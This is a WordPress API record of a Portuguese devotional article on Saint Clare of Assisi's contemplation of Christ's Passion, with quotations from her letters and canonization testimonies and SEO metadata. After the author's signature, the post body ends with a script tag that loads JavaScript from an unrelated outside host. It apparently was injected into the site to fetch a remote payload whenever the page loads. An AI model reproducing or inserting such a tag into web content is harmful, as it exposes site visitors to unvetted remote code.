{"id":19537,"date":"2012-08-02T07:43:54","date_gmt":"2012-08-02T10:43:54","guid":{"rendered":"http:\/\/new.franciscanos.org.br\/?p=19537"},"modified":"2020-05-22T13:03:12","modified_gmt":"2020-05-22T16:03:12","slug":"clara-de-assis-apaixonada-pela-paixao-do-esposo","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/","title":{"rendered":"Clara de Assis, apaixonada pela paix\u00e3o do esposo"},"content":{"rendered":"<blockquote>\n<p style=\"text-align: left;\" align=\"right\"><em><a href=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2012\/08\/clara_sexta.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"alignright size-full wp-image-21086\" title=\"Santa Clara de Assis\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2012\/08\/clara_sexta.jpg\" alt=\"\" width=\"350\" height=\"662\" \/><\/a>Estamos \u00e0s v\u00e9speras da festa de Santa Clara (11 de agosto). Nesse momento todas as aten\u00e7\u00f5es se voltam para os oitocentos anos do carisma da Mulher de Assis \u00a0e de suas irm\u00e3s de S\u00e3o Dami\u00e3o\u00a0 (1212-2012).\u00a0 Nesta primeira sexta-feira de agosto de 2012, queremos\u00a0 chamar aten\u00e7\u00e3o para alguns aspectos da devo\u00e7\u00e3o de Clara pela paix\u00e3o de Jesus e do carinho que tinha pelo\u00a0 \u201clado aberto\u201d\u00a0 do Senhor no alto da cruz.<\/em><\/p>\n<\/blockquote>\n<p><strong>1.<\/strong> Atrav\u00e9s de seus escritos e da biografia de Tom\u00e1s de Celano (<em>Legenda de Santa Clara<\/em>), somos informados de que Clara meditava muitas vezes e profundamente na Paix\u00e3o de Jesus.\u00a0 As Irm\u00e3s rezavam o Of\u00edcio da Paix\u00e3o, composto por Francisco de Assis, e Clara tamb\u00e9m recitava a Ora\u00e7\u00e3o das Cinco Chagas de Cristo. As irm\u00e3s, ao longo do Processo de Canoniza\u00e7\u00e3o da santa,\u00a0 insistem no carinho que a M\u00e3e Clara tinha para com a Paix\u00e3o. Irm\u00e3 Benvinda de Dona Diambra, diz com simplicidade, que Clara \u201clhe ensinou que sempre deveria recordar a Paix\u00e3o do Senhor\u201d. No mesmo processo, Irm\u00e3 In\u00eas lembrava: \u201cDepois ela rezava, especialmente na hora sexta, pois dizia que naquela hora Nosso Senhor foi posto na cruz\u201d.<\/p>\n<p><strong>2.<\/strong> Escrevendo a\u00a0 In\u00eas de Praga, na quarta Carta, falando da contempla\u00e7\u00e3o do espelho, Clara diz: \u201cE no fim desse espelho contemple a caridade inef\u00e1vel com que quis padecer no lenho da cruz e nela morrer a morte mais vergonhosa. Assim, posto no lenho da cruz, o pr\u00f3prio espelho advertia quem passava para o que deviam considerar:<em> \u00d3 vos todos que passais pelo caminho, olhai e vede se h\u00e1 outra dor igual \u00e0 minha <\/em>(<em>Lm 1,12<\/em>).\u00a0 Respondamos a uma s\u00f3 voz, num s\u00f3 esp\u00edrito, ao que clama e grita:<em>\u00a0Vou me lembrar para sempre, e minha vai desfalecer em mim<\/em> (<em>Lm 3,20<\/em>). Tomara que voc\u00ea se inflame cada vez mais no ardor dessa caridade, &#8220;rainha do Rei celeste\u201d (<em>4CtIn 23-27<\/em>). A simples leitura destas linhas nos coloca diante de uma mulher que se det\u00e9m longamente diante do Crucificado. H\u00e1 elementos fundamentais de uma espiritualidade\u00a0 de contempla\u00e7\u00e3o do Crucificado: caridade inef\u00e1vel que quis padecer no lenho e sofrer morte vergonhosa; os que passavam viam a dor do torturado; a alma do que contempla come\u00e7a a arder. Clara deseja que In\u00eas se inflame neste amor. O\u00a0 Cora\u00e7\u00e3o do Mestre \u00e9 fonte de ardor.<\/p>\n<p><strong>3.<\/strong> Mais um testemunho, o da\u00a0 Irm\u00e3 Filipa, filha do falecido Messer Leonardo de Gisl\u00e9rio:\u00a0 \u201cA referida testemunha\u00a0 tamb\u00e9m disse que dona Clara foi t\u00e3o sol\u00edcita na contempla\u00e7\u00e3o que, na sexta-feira santa, pensando na Paix\u00e3o do Senhor, ficou como que insens\u00edvel durante todo aquele dia e grande parte da noite seguinte\u201d (<em>Proc 3,25<\/em>).<\/p>\n<p><strong>4.<\/strong> Nesta rubrica sobre o lado aberto do Cristo na cruz queremos nos\u00a0 deter em outro aspecto. Novamente\u00a0 lan\u00e7amos m\u00e3o\u00a0 dos depoimentos do Processo de Canoniza\u00e7\u00e3o de Santa Clara. Trata-se do testemunho da irm\u00e3 Angeluccia de Messer Angeleio de Espoleto:\u00a0 \u201cA testemunha\u00a0 tamb\u00e9m disse que, uma vez, a santa madre\u00a0 Dona Clara ouviu cantar depois da P\u00e1scoa <em>Vidi aquam egredientem de templo a latere dextro <\/em>\u00a0(cf. <em>Ez 47,1<\/em>), guardou isso na mem\u00f3ria e ficou t\u00e3o contente que, sempre, depois de comer e depois das Completas, fazia servir \u00e1gua benta e ela e\u00a0 \u00e0s outras\u00a0 Irm\u00e3s e dizia: \u201cMinhas irm\u00e3s e minhas filhas, voc\u00eas devem lembrar sempre e guardar na mem\u00f3ria da \u00e1gua bendita que saiu do lado direito de\u00a0 Nosso Senhor Jesus\u00a0 Cristo\u00a0 pendente na cruz\u201d (<em>Proc 14,8<\/em>).<\/p>\n<p><strong>5.<\/strong> A ant\u00edfona\u00a0<em>Vidi aquam<\/em>\u00a0 faz parte do rito de aspers\u00e3o com \u00e1gua benta, previsto para o in\u00edcio da celebra\u00e7\u00e3o eucar\u00edstica\u00a0 dominical e caracter\u00edstica do tempo pascal. Renova a consci\u00eancia\u00a0 do batismo conferido na noite pascal e da \u00e1gua que se junta ao vinho para a celebra\u00e7\u00e3o eucar\u00edstica. Clara repete esse rito de aspers\u00e3o duas vezes ao dia num gesto de significado cristol\u00f3gico. Tem certamente diante dos olhos o Cora\u00e7\u00e3o do Crucificado, a fonte que dele brotou com o golpe da lan\u00e7a. Clara v\u00ea nesse lado aberto o supremo dom do amor, amor derramado sobre o homens por meio da \u00e1gua e do sangue do peito do Senhor. Renovando esse rito na liturgia dom\u00e9stica,\u00a0 Clara nada mais faz \u00a0sen\u00e3o tornar concreta a mem\u00f3ria\u00a0 constante da dor e do amor do\u00a0 Cristo pobre.<\/p>\n<p><strong>6.<\/strong> Conclu\u00edmos ainda com uma cita\u00e7\u00e3o da quarta carta a In\u00eas.\u00a0 Essas linhas falam por si. Dispensam coment\u00e1rios. Estamos diante das n\u00fapcias m\u00edsticas entre a alma e o esposo\u00a0 pobre da cruz. Misturam-se del\u00edcias, honras e\u00a0 riquezas: \u201cAl\u00e9m disso, contemplando suas indiz\u00edveis del\u00edcias, riquezas e honras perp\u00e9tuas, proclame, suspirando com tamanho desejo do cora\u00e7\u00e3o e tanto amor:\u00a0 Arrasta-me atr\u00e1s de ti! Corramos no odor de teus b\u00e1lsamos (<em>Ct 1,3<\/em>), o esposo celeste! Vou correr sem desfalecer at\u00e9 me introduzires em tua adega (<em>Ct 2,4<\/em>), at\u00e9 que a tua esquerda esteja sob a minha cabe\u00e7a, sua direita me abrace (<em>Ct 2,6<\/em>) toda feliz e me d\u00eas o beijo\u00a0 mais feliz de tua boca (<em>Ct 1,1<\/em>) (<em>4CtIn\u00a0 28-32<\/em>).<\/p>\n<p><strong>7.<\/strong> Clara, a contemplativa da Paix\u00e3o do Senhor e que quer ser a esposa daquele\u00a0 Jesus pobre, que deixa seu cora\u00e7\u00e3o esvaziar com o toque da lan\u00e7a do soldado.<\/p>\n<p><strong>Frei Almir Ribeiro Guimar\u00e3es<\/strong><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>1\u00aa Sexta-feira do m\u00eas<\/p>\n","protected":false},"author":1,"featured_media":184654,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[105],"tags":[106,112],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Clara de Assis, apaixonada pela paix\u00e3o do esposo - Vida Crist\u00e3 - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Clara de Assis, apaixonada pela paix\u00e3o do esposo - Vida Crist\u00e3 - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"1\u00aa Sexta-feira do m\u00eas\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/\" \/>\n<meta property=\"og:site_name\" content=\"Vida Crist\u00e3 - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2012-08-02T10:43:54+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-05-22T16:03:12+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/vidacrista\/wp-content\/uploads\/2012\/08\/clara_sexta.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"597\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/vidacrista\/\",\"name\":\"Vida Crist\u00e3 - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/vidacrista\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/\",\"url\":\"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/\",\"name\":\"Clara de Assis, apaixonada pela paix\u00e3o do esposo - Vida Crist\u00e3 - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#website\"},\"datePublished\":\"2012-08-02T10:43:54+00:00\",\"dateModified\":\"2020-05-22T16:03:12+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/133632ca93cec555316a35f76ab4153b\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/vidacrista\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Clara de Assis, apaixonada pela paix\u00e3o do esposo\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/133632ca93cec555316a35f76ab4153b\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/vidacrista\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Clara de Assis, apaixonada pela paix\u00e3o do esposo - Vida Crist\u00e3 - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/","og_locale":"pt_BR","og_type":"article","og_title":"Clara de Assis, apaixonada pela paix\u00e3o do esposo - Vida Crist\u00e3 - Franciscanos","og_description":"1\u00aa Sexta-feira do m\u00eas","og_url":"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/","og_site_name":"Vida Crist\u00e3 - Franciscanos","article_published_time":"2012-08-02T10:43:54+00:00","article_modified_time":"2020-05-22T16:03:12+00:00","og_image":[{"width":800,"height":597,"url":"https:\/\/franciscanos.org.br\/vidacrista\/wp-content\/uploads\/2012\/08\/clara_sexta.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"5 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/vidacrista\/#website","url":"https:\/\/franciscanos.org.br\/vidacrista\/","name":"Vida Crist\u00e3 - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/vidacrista\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/","url":"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/","name":"Clara de Assis, apaixonada pela paix\u00e3o do esposo - Vida Crist\u00e3 - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/vidacrista\/#website"},"datePublished":"2012-08-02T10:43:54+00:00","dateModified":"2020-05-22T16:03:12+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/133632ca93cec555316a35f76ab4153b"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/vidacrista\/clara-de-assis-apaixonada-pela-paixao-do-esposo\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/vidacrista\/"},{"@type":"ListItem","position":2,"name":"Clara de Assis, apaixonada pela paix\u00e3o do esposo"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/133632ca93cec555316a35f76ab4153b","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/vidacrista\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/posts\/19537"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/comments?post=19537"}],"version-history":[{"count":2,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/posts\/19537\/revisions"}],"predecessor-version":[{"id":178079,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/posts\/19537\/revisions\/178079"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/media\/184654"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/media?parent=19537"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/categories?post=19537"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/tags?post=19537"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}